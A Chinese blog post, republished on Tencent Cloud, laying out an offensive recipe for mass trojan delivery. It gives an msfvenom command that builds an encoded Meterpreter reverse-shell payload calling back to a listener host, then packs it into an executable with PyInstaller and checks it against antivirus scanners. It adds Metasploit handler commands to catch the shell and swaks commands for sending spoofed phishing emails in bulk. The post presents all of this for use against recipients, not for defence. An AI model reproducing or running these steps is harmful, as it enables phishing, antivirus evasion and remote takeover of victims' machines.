前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >swaks伪造邮件+免杀shellcode=批量木马上线

swaks伪造邮件+免杀shellcode=批量木马上线

作者头像
洛米唯熊
发布2019-07-25 15:29:53
3.1K0
发布2019-07-25 15:29:53
举报
文章被收录于专栏:洛米唯熊洛米唯熊

0x00:前言

伪造邮件可以参考文章《伪造任意发件人进行邮件钓鱼

其实也可以利用这个《利用office宏反弹shell

今天普及新知识点

0x01:简介

Swaks是由John Jetmore编写和维护的一种功能强大,灵活,可脚本化,面向事务的SMTP测试工具。可向任意目标发送任意内容的邮件。

关于名字 “swaks”这个名字是”SWiss Army Knife Smtp”的首字母缩略词.

发布网站http://www.jetmore.org/john/code/swaks/

这个工具kali自带。没有kali里面啊D搞不定的站,有的话就加上明小子。

0x02:过程

1、先用kali生成payload

语法:msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.198.149 -e x86/shikata_ga_nai -i 11 -f py -o /opt/luomiweixiong.py

效果:

2、给原本的payload加点料

(灰色为加料代码)

(灰色为加料代码)

(灰色为加料代码)

公众号回复:001

获取此代码

3、代码编译

环境准备:pywin32 、pyinstall

语法:

python PyInstaller.py --console --onefile luomiweixiong.py

执行完X:/pyinstaller-2.0\luomiweixiong\dist目录生成luomiweixiong.exe

4、生成完毕,杀毒软件走起

本地杀软

在线查杀

0x03:上线验证

1、kali下启动msf,启动监听模式

代码语言:javascript
复制
    use exploit/multi/handler
    set lhost 192.168.198.149
    set lport 6666
    set PAYLOAD windows/meterpreter/reverse_tcp
    exploit然后在win系统上执行luomiweixiong.exe,最终在msf反弹出meterprer 出来

(等等,说好的批量呢。ちょっと待ってください)

0x04:批量开始

神器语法

代码语言:javascript
复制
swaks -q rcpt -t 邮件地址

首先测试一下邮箱地址是否能伪造发送出去

报550为错误,报250为发送正确。

代码语言:javascript
复制

(亲测QQ邮箱不行、阿里邮箱、gmail邮箱可以,其他的等测试)

发送出去了

马上去看看邮箱

邮件内容自己编,伪造好你的木马。

灯光就位

音响就位

观众就位

请开始你的表演。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-06-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档